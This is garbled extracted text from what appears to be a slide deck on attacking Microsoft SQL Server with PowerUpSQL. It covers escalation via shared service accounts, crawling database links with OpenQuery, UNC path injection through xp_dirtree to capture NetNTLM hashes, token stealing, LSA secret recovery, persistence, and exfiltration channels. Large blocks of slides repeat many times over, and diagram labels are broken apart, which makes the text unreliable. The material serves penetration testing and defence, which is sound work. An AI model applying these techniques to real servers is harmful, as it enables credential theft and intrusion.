Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
